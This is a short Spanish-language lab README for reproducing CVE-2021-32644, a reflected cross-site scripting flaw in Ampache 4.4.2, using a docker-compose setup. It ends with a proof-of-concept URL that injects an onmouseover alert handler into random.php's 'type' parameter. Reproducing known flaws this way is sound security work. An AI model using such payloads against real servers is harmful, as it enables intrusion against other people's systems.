
Ampache XSS
Esta vulnerabilidad es una vulnerabilidad XSS que afectó a las versiones anteriores a Ampache 4.4.3. https://nvd.nist.gov/vuln/detail/CVE-2021-32644
Al realizar la instalación, por favor, haga el reenvío de puertos en el archivo docker-compose.yml. La versión de Ampache que se instala actualmente es la 4.4.2.
$docker-compose up
Vaya a http://[web-server ip]:port/.
Vaya a http://[web-server ip]:port/.
Configure la base de datos mysql como se muestra en la siguiente imagen.

Al insertar el siguiente PoC, se puede ver que se produce la vulnerabilidad XSS.
http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20

https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html